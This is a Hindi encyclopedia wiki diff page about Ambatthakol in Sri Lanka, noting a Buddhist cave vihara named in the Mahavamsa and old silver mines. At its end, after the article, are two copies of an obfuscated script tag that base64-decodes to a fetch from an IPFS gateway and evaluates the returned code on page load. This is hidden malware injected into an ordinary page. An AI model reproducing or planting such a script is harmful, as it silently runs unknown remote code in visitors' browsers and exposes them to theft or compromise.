Difference between revisions of "अंबट्ठकोल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*अंबट्ठकोल [[लंका]] में स्थित है।
+
'''अंबट्ठकोल''' [[लंका]] में स्थित है।
 
*[[महावंश]]<ref>[[महावंश]] 28,20</ref> में अंबट्ठकोलगुहा नामक [[बौद्ध]] विहार का उल्लेख है जिसका अभिज्ञान अनुराधपुर से 55 मील दूर रिदिविहार से किया गया है।  
 
*[[महावंश]]<ref>[[महावंश]] 28,20</ref> में अंबट्ठकोलगुहा नामक [[बौद्ध]] विहार का उल्लेख है जिसका अभिज्ञान अनुराधपुर से 55 मील दूर रिदिविहार से किया गया है।  
*यहाँ [[चांदी]] की खानें थीं।<ref>सिंहाली 'रिदि = चांदी</ref>  
+
*यहाँ [[चांदी]] की खानें थीं।<ref>[[सिंहली|सिंहाली भाषा]] में 'रिदि',  चांदी के लिए प्रयुक्त होता है ।</ref>  
 +
 
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{विदेशी स्थान}}
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना अक्टूबर-2011]]
+
[[Category:विदेशी स्थान]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 08:36, 24 April 2018

aanbatthakol lanka mean sthit hai.

  • mahavansh[1] mean aanbatthakolaguha namak bauddh vihar ka ullekh hai jisaka abhijnan anuradhapur se 55 mil door ridivihar se kiya gaya hai.
  • yahaan chaandi ki khanean thian.[2]


tika tippani aur sandarbh

  1. mahavansh 28,20
  2. sianhali bhasha mean 'ridi', chaandi ke lie prayukt hota hai .

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>